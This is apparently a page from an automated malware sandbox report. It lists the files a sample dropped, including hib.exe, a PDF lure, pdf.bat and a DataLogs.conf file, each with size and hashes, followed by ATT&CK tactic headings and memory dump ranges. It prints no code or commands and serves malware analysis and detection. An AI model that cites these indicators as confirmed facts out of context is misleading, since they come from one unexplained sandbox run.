T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\hib.exe

Filesize
74KB

MD5
93fdf1529d2aa0d785a289a59ada6e09

SHA1
a6332a4f8df04664c3108eadb77048bafe7f7a98

SHA256
987a62c78449150bae48002af18eb6f61a175007e5c1a1284399d259ecbadf91

SHA512
433af518a6b03abdbf370de039dda1f91ddcd7504d78120c5a0091645420f62a4ee117141b7fa928d26cdf0f8ac5caa2ef71c7d4ca9c6487a4eea8ae12da17c2

Download Submit
C:\Program Files\terms-of-appointment-of-id-bal.pdf

Filesize
229KB

MD5
b313153089698efae78da30c092ffc96

SHA1
9567e815004d0af570213bc3628ecce3f899e1a9

SHA256
7ab691924b87bd1a15732ee2ab07d2bd26c5eea52909897d55357420e96c2a6b

SHA512
a5ee0c909c3cf9e163a1642558696e733cf235ee7baffbcf575082666dbb1fd78502b30eeb6efaf7b00b3a3772386a5eb4d5427672f67210bc5262ee82a9f60c

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
a9a161ff81ea87a7b80972cf471bb0e2

SHA1
5ad67e414dde18f4dd7876ca7d07145b42944445

SHA256
62f84f5dcea6f931a033eb9d500674cf76bc881a113d31b02d121004223621ff

SHA512
39d8e6d56277bb1f57923ea80b38c16e5c83cf1526580985950806bc6919c8baa22d70909d424d36220113b07fa97079309df5a896a8e078239bc30bb85cba49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b9781c1af6da2223187f3176c6a049f6

SHA1
c4dd1bfb1e3902755637e814da482ec6294f3db4

SHA256
fc1500d7272e021499ac91141eef49695203d30ce286899343207378c9f44c96

SHA512
f2a9d72c53f63541690bf4a036d3401eb2907008e61a0d1e141dd847de564810cfa5ec414ffd27f585983ad57b8a81cd77d7df77c952c0ef23646870f9b206bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSDFD1.tmp\pdf.bat

Filesize
6KB

MD5
78b38950a064adbd08c1a2528de06908

SHA1
8842caaea45fd61cec87a67802de99e1df9cde67

SHA256
319c2286e8a7ec947d9bbfa6e5a5b7b52daf77d13b5ed7322973dd8eeba56bac

SHA512
6b8f8a701bb8aac0652c41be804e4d7d1b87a58bca4248e58e9e2f501bd6e0c91ad423ffa83ed6448b896fedd2349a8d78283e422dfbf40ae678ca99bba86a01

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xeweufnv.ktk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEB1.tmp.bat

Filesize
188B

MD5
739573efac904fe87566b6eaf2f638bd

SHA1
ab4d336fb6378a6868d629c993aef425d2d61b77

SHA256
01967c0cb13625ee8b2691298bf9bd4bf576307b77540f96c7d6c2b220245925

SHA512
bf988e592ef4559954223094507a7004327ede223245b12f09b33b74f5623ff9a650c72373170ea1bc70d175cdfabcbe48a5200e8dc889063e79b985396d2790

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
memory/2804-64-0x00000000702C0000-0x000000007030C000-memory.dmp

Filesize
304KB

Download
memory/2804-53-0x0000000005A70000-0x0000000005DC4000-memory.dmp

Filesize
3.3MB

Download
memory/4148-22-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

Filesize
120KB

Download
memory/4148-47-0x0000000007530000-0x000000000754A000-memory.dmp

Filesize
104KB

Download
memory/4148-37-0x0000000073A30000-0x00000000741E0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-36-0x00000000064B0000-0x00000000064CE000-memory.dmp

Filesize
120KB

Download
memory/4148-39-0x0000000073A30000-0x00000000741E0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-38-0x00000000070C0000-0x0000000007163000-memory.dmp

Filesize
652KB

Download
memory/4148-40-0x0000000007820000-0x0000000007E9A000-memory.dmp

Filesize
6.5MB

Download
memory/4148-41-0x00000000071E0000-0x00000000071FA000-memory.dmp

Filesize
104KB

Download
memory/4148-42-0x0000000007240000-0x000000000724A000-memory.dmp

Filesize
40KB

Download
memory/4148-43-0x0000000007470000-0x0000000007506000-memory.dmp

Filesize
600KB

Download
memory/4148-44-0x00000000073E0000-0x00000000073F1000-memory.dmp

Filesize
68KB

Download
memory/4148-45-0x0000000007410000-0x000000000741E000-memory.dmp

Filesize
56KB

Download
memory/4148-46-0x0000000007420000-0x0000000007434000-memory.dmp

Filesize
80KB

Download
memory/4148-24-0x0000000006470000-0x00000000064A2000-memory.dmp

Filesize
200KB

Download
memory/4148-48-0x0000000007460000-0x0000000007468000-memory.dmp

Filesize
32KB

Download
memory/4148-51-0x0000000073A30000-0x00000000741E0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-26-0x00000000702C0000-0x000000007030C000-memory.dmp

Filesize
304KB

Download
memory/4148-25-0x0000000073A30000-0x00000000741E0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-23-0x0000000005F60000-0x0000000005FAC000-memory.dmp

Filesize
304KB

Download
memory/4148-21-0x0000000005AD0000-0x0000000005E24000-memory.dmp

Filesize
3.3MB

Download
memory/4148-11-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/4148-10-0x00000000057E0000-0x0000000005846000-memory.dmp

Filesize
408KB

Download
memory/4148-5-0x0000000073A3E000-0x0000000073A3F000-memory.dmp

Filesize
4KB

Download
memory/4148-9-0x0000000004EF0000-0x0000000004F12000-memory.dmp

Filesize
136KB

Download
memory/4148-8-0x0000000004F80000-0x00000000055A8000-memory.dmp

Filesize
6.2MB

Download
memory/4148-7-0x0000000073A30000-0x00000000741E0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-6-0x0000000004910000-0x0000000004946000-memory.dmp

Filesize
216KB

Download
memory/4348-82-0x0000000000D40000-0x0000000000D58000-memory.dmp

Filesize
96KB

Download